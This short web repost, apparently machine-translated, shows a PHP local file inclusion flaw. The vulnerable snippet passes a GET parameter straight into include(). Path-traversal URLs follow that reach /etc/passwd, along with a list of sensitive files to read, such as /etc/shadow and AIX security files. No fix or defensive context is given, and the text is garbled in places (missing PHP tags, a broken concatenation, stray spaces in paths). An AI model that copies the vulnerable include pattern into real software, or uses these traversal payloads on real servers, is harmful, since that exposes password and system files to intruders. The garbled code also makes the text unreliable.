Home > Article > Backend Development > PHP forges local files containing vulnerable code
PHP forges local files containing vulnerable code
- 高洛峰Original
- 2016-11-30 13:17:231183browse
The code is as follows:
$page=$_GET['page'];
include($page.'php');
?>
You can use it like this
http://www.xxx .com/index.php?page=../etc/passwd
http://www.xxx.com/index.php?page=../../../etc/passwd
http://www .xxx.com/index.php?page=..../../etc/passwd
Get more data:
etc/profile
etc/services
/etc/passwd
/etc/shadow
/etc /group
/etc/security/group
/etc/security/passwd
/etc/security/user
/etc/security/environ
/etc/security/limits
/usr/lib/security/mkuser.default
Statement:
The content of this article is voluntarily contributed by netizens, and the copyright belongs to the original author. This site does not assume corresponding legal responsibility. If you find any content suspected of plagiarism or infringement, please contact admin@php.cn
Previous article:How to use explode in php to find whether a certain character existsNext article:How to use explode in php to find whether a certain character exists